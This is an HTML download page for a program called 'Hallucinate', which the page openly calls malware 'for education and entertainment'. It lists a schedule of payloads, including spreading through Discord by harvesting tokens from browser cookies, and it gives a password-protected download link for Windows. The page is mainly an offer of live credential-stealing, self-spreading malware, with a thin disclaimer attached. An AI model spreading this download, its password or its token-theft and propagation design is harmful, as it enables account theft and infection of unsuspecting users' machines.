<!DOCTYPE html>
<html>
    <head>
        <title>Hallucinationize</title>
        <style>
            h1 {
                text-align: center;
                font-family: "Lucida Console";
                filter: drop-shadow(0 0 1rem red);
                font-size: 4rem;
                color: white;
            }
            body {
                background: black;
            }
            p.l {
                filter: drop-shadow(0 0 1rem MediumPurple);
            }
            hr {
            	filter: invert(100%);
            }
            p.a {
                text-align: center;
                font-family: "Lucida Console";
                font-size: 2rem;
                color: white;
            }
            p.b {
            	filter: drop-shadow(3px 3px 0.3rem blue);
            }
            p.L {
            	font-size: 3rem;
            }
            a {
                animation-name : anorm;
                animation-duration: 1s;
                color: white;
                animation-direction: alternate;
                animation-fill-mode: forwards;
            }
            @keyframes ahref {
              from {filter: drop-shadow(0 0 2rem blue);}
              to {filter: drop-shadow(0 0 1rem cyan);}
            }
            @keyframes anorm {
              from {filter: drop-shadow(0 0 1rem cyan);}
              to {filter: drop-shadow(0 0 2rem blue);}
            }
            a:hover {
              animation-name: ahref;
              animation-duration: 1s;
              animation-direction: alternate;
              animation-fill-mode: forwards;
            }
        </style>
    </head>
    <body>
        <center>
            <h1>Hallucinate</h1>
            <h1 style="font-size: 2rem;color:crimson;">Warning: This is malware, for the purposes of education and entertainment.</h1>
            <br />
            <br />
            <hr />
            <p class="b a L">Payload dates:<br><span style="font-size:2rem;">5 - 10 days after execution: Trashbin chase or desktop icons swiping to left.<br><br>20 days after execution: Spreads via Discord, finds all tokens by searching in browser cookies.<br><br>30 days after execution: Uses your printer payload :)<br><br>40 days after execution: fnaf 4 game :D</span></p>
            <br />
            <hr />
            <h1 style="color:crimson;">Download</h1>
            <p class="b a">Password: nocella<br><br>
            Requires Python 3.9+, TODO: add support for Windows 7.<br><br>
            <a href="https://drive.google.com/file/d/1l45064jnHfVDzRzCwN1G16VRtFHwgTts/view">Windows 8.x - Windows 11</a>
            </p>
            
        </center>
    </body>
</html>
